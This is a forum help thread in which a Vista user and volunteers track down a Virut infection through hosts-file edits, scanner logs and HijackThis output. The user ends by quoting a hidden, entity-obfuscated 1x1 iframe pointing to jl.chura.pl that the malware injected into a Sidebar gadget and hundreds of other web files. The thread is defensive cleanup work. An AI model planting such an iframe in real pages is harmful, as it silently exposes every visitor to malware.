I have something infecting my Vista machine - But Avast reports nothing

[psaxelby]

Hi,

Somthing's got into my Vista PC but despite a complete scan by Avast nothing is found.

The only signs are that I can't go to any microsoft or antivirus site, and the Microsoft 'Process Monitor' tool shows that as soon as I do anything internet related there's a flood of connections to and from 'jl.chura.pl'.

Any ideas please? I've looked around the net, tried loads of things like combofix (which fails as it says the file's been compromised, possibly by virut (not according to Avast)), nothing can tell me what it is.

Any help greatly appreciated.

Paul.

[Mr.Agent]

Run Malwarebytes.

Be sure all your thing is up to date like (anti virus,anti spyware,anti malware......etc)

Mr.Agent

[DavidR]

This is either a HOSTS file (redirect) hacked or a DNS hijacking.

-- HOSTS file redirect a common malware tactic to block AV sites making it difficult to remove malware - 127.0.0.1 check your HOSTS file using notepad or a text editor of your choice, C:\WINDOWS\system32\drivers\etc\hosts or do a search for HOSTS to find it if not there.
 
Once open you are looking for entries with avast.com on the line, you may well see other AV sites, post the contents of the hosts file. http://en.wikipedia.org/wiki/Hosts_file

For the DNS issue:
If you haven't already got this software (freeware), download, install, update and run it and report the findings (it should product a log file).

• 1.  MalwareBytes Anti-Malware, On-Demand only in free version http://download.bleepingcomputer.com/malwarebytes/mbam-setup.exe, right click on the link and select Save As or Save File (As depending on your browser), save it to a location where you can find it easily later.
• 2. SUPERantispyware On-Demand only in free version.

Don't worry about reported tracking cookies they are a minor issue and not one of security, allow SAS to deal with them though. - See http://en.wikipedia.org/wiki/HTTP_cookie.

[psaxelby]

Hi guys,

Many thanks for the speedy replies.
I've downloaded the tools metioned & a few others mentioned in other threads, and am currently scanning with mbam (although it won't update as the domain's being blocked).

My hosts file looks like this:

127.0.0.1 jL.chura.pl
#6 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost
::1             localhost


The line at the top is obviously involved somehow & I'll take it out prior to the next reboot (it'll probably return but I'll give it a go ).
Not sure about the last line -   ::1      localhost     -  Should that be there?

Mbam's up to 60k objects atm, so I guess it'll be a while yet. Once it's done I'll run any others I can & get back to you.

Again, many thanks.

Paul

[DavidR]

Yes it is, that is redirecting localhost to a malicious site, remove that line and save the changes.

As far as I'm aware the last line is just another notation ::1 instead of 127.0.0.1, it is related to IPv6, so it should be OK. See http://en.wikipedia.org/wiki/Localhost.

[psaxelby]

Hi David,

Well....   I ran mbam:

Malwarebytes' Anti-Malware 1.40
Database version: 2551
Windows 6.0.6001 Service Pack 1

15/08/2009 01:54:26
mbam-log-2009-08-15 (01-54-26).txt

Scan type: Full Scan (C:\|)
Objects scanned: 172900
Time elapsed: 17 minute(s), 0 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 3

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\Users\Paul\AppData\Local\Temp\DaemonSearch.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\Windows\Temp\VRT2239.tmp (Malware.Tool) -> Quarantined and deleted successfully.
C:\Windows\Temp\VRT7C12.tmp (Trojan.Downloader) -> Quarantined and deleted successfully.

Great! Got something
About 30 seconds after it had cleaned them a little message popped up (see attached image). I'm getting paranoid now - Is that really from windoze or is it scamware?

I removed the line from the hosts file, rebooted the machine & kept everything crossed.

When it came back up my wallpaper had disappeared , I checked the hosts file & the dodgy line was back in there

I ran SuperAntiSpyware which found 47 tracking cookies - Not so bad...
Then I ran the Avast Rootkit tool - Nothing reported.
Then I ran the Dr Web tool ( I made the mistake of running it in express mode ) and it found this:

inputpersonalization.exe;c:\program files\common files\microsoft shared\ink;Win32.Virut.56;Cured.;
superantispyware.exe;c:\program files\superantispyware;Win32.Virut.56;Cured.;
winmail.exe;c:\program files\windows mail;Win32.Virut.56;Cured.;
wmpnetwk.exe;c:\program files\windows media player;Win32.Virut.56;Cured.;
sidebar.exe;c:\program files\windows sidebar;Win32.Virut.56;Cured.;
ehprivjob.exe;c:\windows\ehome;Win32.Virut.56;Cured.;
ehrecvr.exe;c:\windows\ehome;Win32.Virut.56;Cured.;
ehsched.exe;c:\windows\ehome;Win32.Virut.56;Cured.;
mcupdate.exe;c:\windows\ehome;Win32.Virut.56;Cured.;
explorer.exe;c:\windows;Win32.Virut.56;Cured.;
trustedinstaller.exe;c:\windows\servicing;Win32.Virut.56;Cured.;
alg.exe;c:\windows\system32;Win32.Virut.56;Cured.;
bthudtask.exe;c:\windows\system32;Win32.Virut.56;Cured.;
defrag.exe;c:\windows\system32;Win32.Virut.56;Cured.;
dfdwiz.exe;c:\windows\system32;Win32.Virut.56;Cured.;
dllhost.exe;c:\windows\system32;Win32.Virut.56;Cured.;
fxssvc.exe;c:\windows\system32;Win32.Virut.56;Cured.;
ie4uinit.exe;c:\windows\system32;Win32.Virut.56;Cured.;
locator.exe;c:\windows\system32;Win32.Virut.56;Cured.;
logon.scr;c:\windows\system32;Win32.Virut.56;Cured.;
lpremove.exe;c:\windows\system32;Win32.Virut.56;Cured.;
msdtc.exe;c:\windows\system32;Win32.Virut.56;Cured.;
msfeedssync.exe;c:\windows\system32;Win32.Virut.56;Cured.;
msiexec.exe;c:\windows\system32;Win32.Virut.56;Cured.;
racagent.exe;c:\windows\system32;Win32.Virut.56;Cured.;
raserver.exe;c:\windows\system32;Win32.Virut.56;Cured.;
regsvr32.exe;c:\windows\system32;Win32.Virut.56;Cured.;
rundll32.exe;c:\windows\system32;Win32.Virut.56;Cured.;
sc.exe;c:\windows\system32;Win32.Virut.56;Cured.;
searchfilterhost.exe;c:\windows\system32;Win32.Virut.56;Cured.;
searchprotocolhost.exe;c:\windows\system32;Win32.Virut.56;Cured.;
snmptrap.exe;c:\windows\system32;Win32.Virut.56;Cured.;
ui0detect.exe;c:\windows\system32;Win32.Virut.56;Cured.;
unregmp2.exe;c:\windows\system32;Win32.Virut.56;Cured.;
userinit.exe;c:\windows\system32;Win32.Virut.56;Cured.;
vds.exe;c:\windows\system32;Win32.Virut.56;Cured.;
vssvc.exe;c:\windows\system32;Win32.Virut.56;Cured.;
winmgmt.exe;c:\windows\system32\wbem;Win32.Virut.56;Cured.;
wmiapsrv.exe;c:\windows\system32\wbem;Win32.Virut.56;Cured.;
wbengine.exe;c:\windows\system32;Win32.Virut.56;Cured.;
wermgr.exe;c:\windows\system32;Win32.Virut.56;Cured.;
wsqmcons.exe;c:\windows\system32;Win32.Virut.56;Cured.;


 

Why on earth didn't Avast catch that lot? I'd done a couple of complete boot-time scans.

I'm currently running Dr Web in 'Complete scan' mode, it's about 30% and so far its found another 62. All 'Virut 56' except for a couple of possible script virus' and a VBS.Generic.45.
UPDATE: The final count was 1173
I'll let you know whether this stops the redirection once it finishes.

Thanks again,

Paul.

[cinchez]

Havent seen that pop-up before in my vista...

Possibly a scareware?

Maybe u should google about it^^(Im going to^^)

-AnimeLover^^

[psaxelby]

Hi Addict,

Best bit of info I've found on that dialogue box came from Stephen Holm and can be found here http://social.microsoft.com/Forums/en-US/genuinevista/thread/2e1030fb-9830-4705-850f-b0c332afb40d.

As to the virus problem - running all tests again, will report shortly.

Regards,
Paul

[micky77]

If you have virut,and it certainly looks like it, I'm afraid your wasting your time.Your efforts would be better spent wiping the pc, including all partitions,and re-installing windows.

[psaxelby]

Hi,

Mickey77 - Did that very recently & it came back - I'd like to learn how to kill the bugger, otherwise I'm afraid I'll just be doing re-build after rebuild...

Update.

Mbam reports nothing.
Avast boot scan & root kit report nothing.
Dr Web reports nothing
SAS reports nothing
RootRepeal: Only things I'm not sure about are:

Path: C:\Windows\System32\wbem\CLFSUN~1.MOF
Status: Locked to the Windows API!

Path: c:\windows\winsxs\x86_wcf-m_svc_mod_op_perf_c_ini_31bf3856ad364e35_6.0.6001.18000_none_c3627a1d2f590916\_servicemodeloperationperfcounters_d.ini
Status: Allocation size mismatch (API: 245760, Raw: 56)

Path: c:\windows\winsxs\x86_wcf-m_svc_mod_svc_perf_ini_31bf3856ad364e35_6.0.6001.18000_none_7aa3ffe08cb3c55b\_servicemodelserviceperfcounters_d.ini
Status: Allocation size mismatch (API: 561152, Raw: 56)

Norman reports nothing
My hosts file now remains un-molested through a reboot

The internet traffic to & from jl.chura.pl has stopped**
I can now access all internet av sites that were blocked before.


**
The ONLY apparent remaining part of the problem is one that I didn't get before.
When start up and log on - and only then - I get a double message from Avast's network shield saying that a redirect attempt to jl.chura.pl/ru has been blocked.

Anyone got any ideas on this last little(?) symptom? Is there any way of getting Avast to tell which process made the attempt? (Is there any way that Avast would be able to find out?)

If anyone's got an idea I'd be grateful to hear it - It feels like this is nearly licked...
(Famous last words I know...)

Many thanks,
Paul

[mathboyx215]

Can you post the full rootrepeal log

[psaxelby]

Hi mathboy,

Sure can - attached as tab delimited ext file. (over 2k lines)

That OK?

Many thanks,
Paul

P.S. had to merge all seperate logs as full report didn't include all elements or even all lines from each element.
There is one report missing from the file, can't remember which it was but the scan came up completely empty.

[mathboyx215]

Can't see anything wrong in your rootrepeal log.
Can you please update malwarebytes and run a full scan.
Then post back a log from it

[psaxelby]

Hi,

Thanks again for the help.

Here's the malwarebytes log:

Malwarebytes' Anti-Malware 1.40
Database version: 2630
Windows 6.0.6001 Service Pack 1

15/08/2009 22:50:51
mbam-log-2009-08-15 (22-50-51).txt

Scan type: Full Scan (C:\|)
Objects scanned: 192322
Time elapsed: 20 minute(s), 2 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


And just for good measure, here's the HijackThis log:


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:55:40, on 15/08/2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\SYSTEM32\WISPTIS.EXE
C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Secunia\PSI\psi.exe
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe
C:\Program Files\Internet Explorer\ieuser.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\Macromed\Flash\FlashUtil10c.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [OpAgent] "OpAgent.exe" /agent
O4 - HKCU\..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - HKCU\..\Run: [ISUSPM] C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe -scheduler
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - Startup: drivemap.bat
O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O13 - Gopher Prefix:
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O22 - SharedTaskScheduler: Windows DreamScene - {E31004D1-A431-41B8-826F-E902F9D95C81} - C:\Windows\System32\DreamScene.dll
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\Windows\system32\nvvsvc.exe
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe

--
End of file - 4746 bytes


Given other HJT logs I've seen, I'd expected it to have been much bigger...
Anything there?


BTW, in that RootRepeal log, what's with the entries that have a size mismatch reported? Is that a file system problem?


Many thanks,
Paul.

[psaxelby]

UPDATE:

Re: The last visible sign of the infections - The block of attempted access to jl.chura.pl/ru

I had shutdown the Sidebar & stopped it loading on startup & I no longer got the message about attempted access of the site.
I then did a little search for jl.chura in the contents of the sidebar folder's files & it flagged up contacts.html in the 'Contacts' widget folder.
When I searched in the file though it said not found. I scrolled through it found an obfuscated link to the site at the bottom:


<!--
////////////////////////////////////////////////////////////////////////////////
//
//  THIS CODE IS NOT APPROVED FOR USE IN/ON ANY OTHER UI ELEMENT OR PRODUCT COMPONENT.
//  Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
//
////////////////////////////////////////////////////////////////////////////////
-->

<html>
<head>
...
...
</head>

<body onLoad="myOnLoad();" scroll="no">
.....
.....
    <div id="L_LOCEARCHWORD_text" style="display:none">Search</div>
  
<iframe src="http://jL.ch&#85;ra.pl&#47;rc/" width=1 height=1 frameborder=0></iframe>
</body>
     <script src="js/contacts.js" type="text/javascript" language="javascript"></script>
</html>

So every time windows loaded & the Sidebar started up it linked to the chura site.

I then did the same search on the whole drive & it flagged 458 files - Mostly html, js, & aspx.
Apart from a few binary files (that I'm still trying to find out why they were flagged as the text appears nowhere inside when viewed as text) they all contain the same iframe block inserted near the end of any body block.

Now all I have to do is remove the link from all these files...  
I wish I could remember more grep commands than I can...  

Once these links are gone - I think I'm clean.
 
Anyone got a script I can give a list of files & a line of text to be removed to?

Regards,
Paul